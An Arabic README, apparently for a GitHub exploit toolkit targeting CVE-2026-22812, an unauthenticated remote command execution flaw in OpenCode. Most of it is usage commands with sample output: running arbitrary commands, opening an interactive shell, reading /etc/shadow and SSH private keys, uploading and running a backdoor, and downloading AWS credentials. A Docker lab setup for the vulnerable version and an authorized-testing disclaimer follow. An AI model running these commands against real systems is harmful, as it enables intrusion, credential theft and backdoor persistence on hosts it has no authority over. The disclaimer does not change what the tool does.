
أداة استغلال لثغرة CVE-2026-22812 (تنفيذ أوامر عن بُعد غير مصادق عليه في OpenCode) توفر غلافًا تفاعليًا، وتنفيذ أوامر عشوائية، ورفع/تنزيل الملفات، واستكشاف النظام لاختبارات الأمان المصرح بها.
مجموعة أدوات استغلال كاملة لـ CVE-2026-22812 - تنفيذ أوامر عن بُعد بدون مصادقة في OpenCode
أداة استغلال CVE-2026-22812 هي إطار عمل شامل لاستغلال ثغرة تنفيذ الأوامر عن بُعد بدون مصادقة في OpenCode. توفر هذه الأداة طرق استغلال متعددة تشمل الصدفة التفاعلية، وعمليات الملفات، وجمع معلومات النظام.
# استنساخ المستودع
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit
# تثبيت التبعيات
pip3 install -r requirements.txt
pip3 install requests urllib3
python3 exploit.py -t http://192.168.1.10:4096 --verify
المخرجات:
[+] الهدف قابل للاستغلال ضد CVE-2026-22812!
[+] معرف الجلسة: abc123def456
python3 exploit.py -t http://192.168.1.10:4096 -c "id"
المخرجات:
[*] إنشاء جلسة...
[+] تم إنشاء الجلسة: abc123def456
[+] الهدف قابل للاستغلال!
[*] التنفيذ: id
[+] تم تنفيذ الأمر بنجاح
uid=1000(developer) gid=1000(developer) groups=1000(developer)
python3 exploit.py -t http://192.168.1.10:4096 -i
الجلسة التفاعلية:
[+] تم إنشاء الجلسة: abc123def456
[+] الهدف قابل للاستغلال!
[*] الدخول إلى وضع الصدفة التفاعلية
[!] اكتب 'help' لعرض الأوامر، و'exit' للخروج
developer@target$ whoami
developer
developer@target$ pwd
/home/developer/workspace
developer@target$ ls -la
total 48
drwxr-xr-x 8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x 3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r-- 1 developer developer 220 Jan 15 09:20 .bash_logout
...
developer@target$ read /etc/hostname
[*] قراءة الملف: /etc/hostname
[+] تمت قراءة الملف بنجاح (10 بايت)
dev-server-01
developer@target$ exit
[*] الخروج...
# أمر واحد
python3 exploit.py -t http://target:4096 -c "whoami"
# أمر معقد
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"
# أوامر متعددة
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"
# قراءة ملفات حساسة
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa
# رفع سكربت شل
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh
# رفع ملف ثنائي
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload
# رفع مع التنفيذ
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"
# تنزيل ملف إعدادات
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt
# تنزيل بيانات الاعتماد
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt
# تنزيل الكود المصدري
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json
# جمع معلومات النظام
python3 exploit.py -t http://target:4096 --sysinfo
المخرجات:
{
"hostname": "dev-server-01",
"username": "developer",
"user_id": "uid=1000(developer) gid=1000(developer)",
"current_dir": "/home/developer/workspace",
"kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
"os_release": "Ubuntu 22.04.3 LTS",
"ip_address": "192.168.1.10",
"processes": "..."
}
npm install -g opencode-ai@latestpkill -f opencode# Dockerfile لإصدار OpenCode القابل للاستغلال
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
# البناء والتشغيل
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln
# اختبار الاستغلال
python3 exploit.py -t http://localhost:4096 -i
# تثبيت الإصدار القابل للاستغلال
npm install -g [email protected]
# تشغيل OpenCode
opencode
# في طرفية أخرى، تشغيل الاستغلال
python3 exploit.py -t http://localhost:4096 --verify
⚠️ لا تنشر أبدًا الإصدارات القابلة للاستغلال في بيئة الإنتاج!
اقرأ بعناية
هذه الأداة مقدمة لأغراض اختبار الأمان المصرح به فقط.
المؤلفون:
باستخدامك لهذه الأداة، فإنك توافق على:
استخدم على مسؤوليتك الخاصة
⭐ امنح نجمة إذا كانت مفيدة! ⭐
لأغراض اختبار الأمان المصرح به فقط